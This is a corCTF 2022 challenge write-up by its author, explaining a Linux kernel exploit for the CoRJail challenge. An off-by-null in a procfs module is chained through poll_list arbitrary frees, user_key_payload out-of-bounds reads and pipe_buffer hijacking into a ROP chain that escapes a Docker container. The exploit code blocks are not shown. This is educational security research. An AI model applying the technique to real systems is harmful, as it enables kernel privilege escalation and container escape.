CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters exploiting a Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from a nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!
Overview
Last year FizzBuzz101 and me, designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. During this year, the technique has been extensively used in real world exploits and later extended to be used with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges of
which solutions required a novel approach. I decided to write CoRJail, demonstrating a novel
approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary
free primitive obtainable in almost every general purpose cache exploiting
poll_list
objects. FizzBuzz101 instead, designed a challenge, Cache
of
Castaways,
of which solution required a cross-cache overflow into cred_jar to
corrupt the current task’s cred structure to get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, like KASLR
,
SMEP
, SMAP
,
KPTI
,
CONFIG_SLAB_FREELIST_RANDOM
,
CONFIG_SLAB_FREELIST_HARDENED
etc. were enabled.
CONFIG_STATIC_USERMODEHELPER
was set to true,
forcing usermode helper calls through a single binary and
CONFIG_STATIC_USERMODEHELPER_PATH
was set to an
empty string. In other words, no modprobe_path
trick.
Finally, I unset CONFIG_DEBUG_FS
and
CONFIG_KALLSYMS_ALL
, making many symbols not
available in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs
interface, was created to actually display per-CPU syscall count,
restricting the displayed result only to syscalls specified in a filter.
Users were allowed to set a new filter using
echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon
.
For example:
echo -n 'sys_read,sys_write' > /proc_rw/cormon
.
The default CoRMon filter was actually a hint, indeed it displayed many
syscalls I used in my exploit: poll()
, keyctl()
and setxattr()
.
If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.
Please note that I could not upload the coros.qcow2 image on Github because of its size, so you will need to build it yourself using the provided script.
TL;DR
Exploit a Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the relatively complex exploitation stage and the 48 hours limit, I decided to make the bug extremely easy to spot and trigger. On the other hand I decided to not provide source code, considering the reverse engineering process would not have taken too long.
Here is the original CoRMon source code:
|
|
We can interact with the module through a procfs interface using
read()
and write()
. When we use write()
the
cormon_proc_write()
function is called to process the user input.
The cormon_seq_show()
function instead, is used to display syscalls
information when we use read()
.
As we can see, there is a clear Off-By-Null in cormon_proc_write()
.
Let’s extract the function from source code and ignore the rest:
|
|
If the number of bytes written is greater than PAGE_SIZE
(4096) then
the len
variable is set to PAGE_SIZE - 1
, otherwise it is set to
count
. [1]
Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2]
and the list of syscalls is copied from user-space to kernel-space: it
will be parsed by update_filter()
. [3] The list,
now copied to kernel-space, is subsequently null terminated. [4]
The check is clearly not covering the case where the number of bytes
written is equal to PAGE_SIZE
. Indeed, in that case, len
would be
equal to count
, and the line
syscalls[len] = '\x00'
, would result in
syscalls[4096] = '\x00'
, causing the null byte to
be written out of bounds.
This, will be enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.
Many other syscalls are
also blocked, including msgget()
, msgsnd()
and msgrcv()
, so for
this time the old good msg_msg
will be left out of the picture.
Instead, our exploitation process will mainly rely on poll_list
objects. This structure can be used from within the container without
having to meet any specific requirements.
The technique we will cover in this article, is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, here instead we only have a single null byte written out of bounds.
poll_list objects, are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.
int poll(struct pollfd fds[], nfds_t nfds, int timeout);
poll()
accepts three arguments:
fds
: an array ofpollfd
structures.nfds
: the number ofpollfd
structures in the fds array.timeout
: the number of milliseconds for an event to occur.
The poll_list
structure, is composed by a pointer to the next
poll_list
[1], a length field, corresponding to the number of
pollfd
structures in the entries
array [2], and entries
, a
flexible array of pollfd
structures [3]. Each entry is 8 bytes
in size.
When we use the poll()
syscall,
do_sys_poll()
is called in kernel-space. This function is responsible for copying the
entries we passed to poll()
in the fds
array to
kernel-space:
|
|
do_sys_poll()
has two paths, a slow and a fast path. As we can
see at the beginning of the function, stack_pps
[1], a buffer
of 256 bytes, is defined. It is used to store the first 30 pollfd
entries [2]. This is the fast path: entries are stored on the
stack to save memory and improve speed.
If we submit more than 30 pollfd
entries, we enter the slow path and
the remaining ones are allocated on kernel heap. This means that
if we do the math correctly, controlling the number of monitored file
descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]
It is possible to allocate a maximum of
POLLFD_PER_PAGE
(510) entries per page. [3] If this limit is exceeded, a new
poll_list
is allocated to store the remaining entries and it is
connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
Let’s say for example we call poll()
, providing 510 + 1 file
descriptors to the syscall. This, in kernel space, results in a
poll_list
with 510 entries allocated in kmalloc-4k and a second
poll_list
, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list:
After all poll_list
objects have been allocated, there is a call to
do_poll(): it will monitor provided file descriptors until a specific
event occurs or the timer expires. [5] The end_time
variable here,
corresponds to the timeout
variable we passed as third argument to the
poll()
syscall.
This means that poll_list
objects can be kept in
memory for an arbitrary amount of time, then, when timer expires, they
will be automatically freed.
The very interesting part, is how poll_list
structures are freed: a
while loop is used to traverse the singly linked list, freeing each of
them. [6] Now let’s look at what we have from an attacker’s prospective.
We have a structure that can be allocated in multiple caches, ranging
from kmalloc-32 to kmalloc-4k, and the object pointed by its next
field (first QWORD) is automatically freed when a timer, that we
control, expires. This means that given a Out-Of-Bounds Write or a
Use-After-Free Write primitive we can overwrite the next
field of a
poll_list
structure with the address of a target object and when the
timer fires, that object will be automatically freed.
The only constraint, is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop, will treat it as a valid pointer, and will try to access it. This is not a problem, we can use a misaligned free primitive or we can simply target objects of which first QWORD is equal to zero.
In the specific case of kmalloc-4k, if the poll_list->next
field
already contains a valid pointer to another poll_list
, we can corrupt
it with a partial overwrite (even with a single byte), making it point
to another object in the slab. When timer expires, the kernel will be tricked into
freeing the wrong object. This, is exactly what we are going to
do in the exploit.
The following code can be used to allocate poll_list
structures in
kernel space. Note that we need to use threads to spray this object
because the poll()
syscall will block until a specific event occurs or the timer expires.
|
|
The Exploit - From Zero To Information Leak
The strategy we are going to use in the first part of the exploit,
consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the
next
field of a poll_list
structure chained to another one in
kmalloc-32, making the corrupted pointer point to another object in the
slab. When the timer fires, that object will be automatically freed.
We need to choose a target structure that once arbirarily freed, can be
corrupted and can give us a Out-Of-Bounds Read primitive, with
subsequent information leak. There are multiple elastic objects in the
Linux kernel that may do the trick. A good candidate could be
simple_xattr,
but we need the first QWORD of the target object to be NULL, so we
cannot use it. Since add_key()
and keyctl()
are not blocked by seccomp, we can opt for
user_key_payload
instead.
The problem with this structure, is that its first member,
struct rcu_head rcu
, is not initialized, and
since the structure is allocated with
kmalloc,
the first QWORD might not be NULL. A practical solution comes from
setxattr():
we can use it to fill the chunk with zeros before allocating each user key.
|
|
With setxattr()
, we can allocate a chunk of arbitrary size [1]
and fill it with arbitrary data [2], then, it will be
automatically freed [3]. We can
exploit this function to make sure the uninitialized member of
user_key_payload
is actually zero.
We simply need to call
setxattr()
right before alloc_key()
: because of freelists LIFO
behavior, once the chunk used by setxattr()
is allocated, filled with
zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.
With this in mind, we can start writing our exploit:
|
|
First, we assign the current process to core 0 using
assign_to_core()
(a
sched_setaffinity()
wrapper), since we are working in a multi-core environment and slabs are
per-CPU. [1] Then, we start spraying many
seq_operations
structures in kmalloc-32 to fill partial slabs, so the next allocations
will end up in a brand new slab. [2]
We proceed using alloc_key()
(a simple add_key()
wrapper) to spray
many user_key_payload
structures in kmalloc-32. [3] As
explained above, we use setxattr()
to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray poll_list
structures in kmalloc-4k, chained to
poll_list
in kmalloc-32. [4] At this point the situation in
memory will probably be similar to [Fig. 1A], with unallocated
chunks in white, poll_list
in green, and user_key_payload
in
orange.
We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a poll_list
next
pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k by writing
4096 bytes to the CoRMon procfs interface. [1] This will also
cause a null byte to be written out of bounds, and will corrupt the next
object in memory. Since we sprayed poll_list
structures in
kmalloc-4k, and each one has a pointer to a poll_list
in kmalloc-32,
we will be able to corrupt one of the pointers, making it point to one
of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can use join_poll_threads()
and wait until timers
expire and poll_list
objects are automatically freed. [2] One of the user_key_payload
will be released as well. [Fig. 2B]
We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain a Out-Of-Bounds Read primitive:
|
|
First, we spray many
seq_operations
structures in kmalloc-32. One of them will overwrite the user key we
freed in the previous step, corrupting its len
field (an unsigned
short) with the two lower bytes of the
single_next
pointer.
In our case, the two lower bytes of single_next
are
0x4330
, so this will give us a huge Out-Of-Bounds
Read primitive. A
proc_single_show()
pointer instead, will overwrite the first qword in the user key data field.
[1] You can see the seq_operations
structures in yellow in
[Fig. 3A], one of them corrupted the key.
We can now use leak_kernel_pointer()
to iterate
through all the keys until we leak the proc_single_show
address,
this way we will identify the corrupted key and we will be able to
calculate the kernel base address. [2] Now we need to reuse the
Out-Of-Bounds Read primitive to leak a heap address.
When we open a ptmx, two structures
of our interest are allocated, the well known
tty_struct
in kmalloc-1024 and another one,
tty_file_private
in kmalloc-32. Each tty_file_private
structure, has a pointer to
relative tty_struct
, therefore we can use it to leak the address of an object in
kmalloc-1024.
We can free all the keys in kmalloc-32 (orange chunks in [Fig.
3A]), [3] except the corrupted one, and replace
them with tty_file_private
structures (blue chunks in [Fig.
3B]). [4] Then we call
leak_heap_pointer()
and use the Out-Of-Bounds Read primitive to leak
the tty_struct
address. [5] [Fig. 3B]
The Exploit - Hijacking Control Flow
At this point we need to free the object in kmalloc-1024.
|
|
First, we free all the seq_operations
structures in kmalloc-32
(yellow chunks in [Fig. 3A-3B]) [1], then we replace them
with poll_list
objects (green chunks in [Fig. 4A]) [2].
Note that the seq_operations
structure used to corrupt the user key
is also freed and it is also replaced by a poll_list
structure.
[Fig. 4A]
Now we free the corrupted key, causing a Use-After-Free
situation over the poll_list
. [3] To exploit the
Use-After-Free, we reuse the setxattr()
trick used in the first stage,
but this time, instead of zeroing out the chunk, we set its first QWORD
to target object - 0x18
bytes [4], then we
allocate a user_key_payload
structure to consolidate the setxattr
buffer in memory.
In other words, since the chunk used by setxattr
is
automatically freed when the function returns, we allocate a user key
(remember, the first member of a user_key_payload
structure is not
initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5]
Doing so, we
will overwrite the next
field of the poll_list
structure in
kmalloc-32 with the target - 0x18
bytes.
[Fig. 4B]
Originally, my goal was to arbitrarily free a tty_struct
and get RIP
control overwriting its
tty_operations
pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to
target a
pipe_buffer
structure.
|
|
We proceed freeing all TTYs [1],
and we spray pipe_buffer
objects [2]. This way we replace
all tty_struct
with pipe_buffer
in kmalloc-1024. Then, we wait
until timers expire, and the pipe_buffer
object pointed by the next
field of the corrupted poll_list
, is automatically freed. [Fig.
5.A]
Finally, we free all user keys, and we reallocate them in kmalloc-1024:
we use them to spray our ROP-chain. [3] One of the key payloads
will corrupt the target pipe_buffer
, overwriting the
anon_pipe_buf_ops
pointer with a stack pivot gadget.
Now we only need to close all pipes, triggering the call to pipe_release(). [4] This, will execute our stack pivot gadget and we will be finally able to hijack control flow. [Fig. 5B]
The Exploit - Container Escape
The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look to what I used in the exploit:
|
|
The first part has nothing special. We use a stack pivot gadget to hijack control flow [1], then prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() [4] and we use switch_task_namespaces() [5] to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, this means that we cannot use it to enter other namespaces after returning in user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
Reading the
setns()
source code, we can see that it calls
commit_nsset()
to actually move the task into a different namespace. We can replicate
what it does using
copy_fs_struct()
to clone the
init_fs
structure [6], then we locate the current task using
find_task_by_vpid()
[7] and we manually install the new
fs_struct
using a write-what-where gadget. [8]
We can finally use the KPTI
trampoline with swapgs_restore_regs_and_return_to_usermode
and get a shell on the host. [9]
Here is the final exploit in action:
The final exploit can be found here: exploit.c.
PS: In the exploit I assign
the process to another core before creating poll threads. This is useful
to reduce noise due to thread creation on core 0 slabs. Once a thread
has been created, it is assigned back to core-0 before calling poll()
.
Conclusion
poll_list
objects, can be used to obtain an arbitrary free
primitive in almost every general purpose cache. Many recent
vulnerabilities can be exploited using this structure in complete
absence of msg_msg
objects.
CoRJail only had one solver. A big
shout out goes to Kylebot for getting first
blood. It turns out that Extended security
attributes were
usable inside the container without requiring any special capability. So
he could solve the challenge transforming the Off-By-Null in kmalloc-4k
into a Cross-Cache Null Byte Overflow, targeting the list.next
pointer
of a
simple_xattr
structure in kmalloc-192.
This cache is unaligned, so he made the corrupted pointer point in
middle of another simple_xattr
object in the same slab. Here, he forged
a fake header to obtain an Out-Of-Bounds Read primitive.
To fake a simple_xattr
structure, he needed a valid pointer containing controlled data in the name
field, so he ended up using another kCTF technique. He faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR, and as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers in this zone and use them as a payload.
After obtaining information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?
If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.
The challenge can be downloaded from the corCTF 2022 Public Archive.
References
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
modprobe_path trick
Unlinking attack with simple_xattr